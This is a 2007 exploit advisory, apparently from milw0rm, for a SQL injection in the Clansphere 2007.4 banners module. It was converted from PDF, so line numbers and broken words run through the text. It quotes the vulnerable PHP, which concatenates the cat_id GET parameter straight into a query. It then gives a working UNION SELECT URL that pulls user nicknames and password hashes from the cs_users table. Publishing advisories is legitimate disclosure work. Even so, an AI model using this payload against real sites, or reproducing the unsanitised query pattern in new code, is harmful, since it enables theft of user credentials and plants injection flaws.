Clansphere 2007.4 cat_id Remote SQL Injection Vulnerability.pdf

1 2 ######################################################################################### 3 # 4 # Inclusion Hunter Team 5 # http://www.ihteam.net 6 # 7 # 8 # [Clansphere 2007.4] 9 # 10 # 11 # Class: SQL Injection 12 # Found: 22/09/2007 13 # Remote: Yes 14 # Site: http://www.clansphere.net/ 15 # Download: http://sourceforge.net/project/showfiles.php?group_id=95430 16 # Author: R00T[ATI] of IHTeam 17 # Contact: r00t.ati@ihteam.net − http://www.ihteam.net 18 # 19 ######################################################################################### 20 21 22 Vulnerable code: 23 mods/banners/navlist.php 24 ============================================================================================================ 25 if(!empty($_GET[’cat_id’])) { 26 $where = "categories_id = ’" . $_GET[’cat_id’] . "’"; 27 ============================================================================================================ 28 29 30 31 32 Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!): 33 =================================================================================================================== 34 http://www.site.com/[path]/index.php?mod=banners&cat_id=−1’%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,user s_pwd),null,nu 35 36 ll%20FROM%20cs_users/* 37 =================================================================================================================== 38 39 40 Thanks To: 41 ================================= 42 White_Sheep for his Bugs Hunter; 43 ================================= 44 45 # milw0rm.com [2007−09−22] Page 1/1 Clansphere 2007.4 cat_id Remote SQL Injection Vulnerability IHTeam 09/22/2007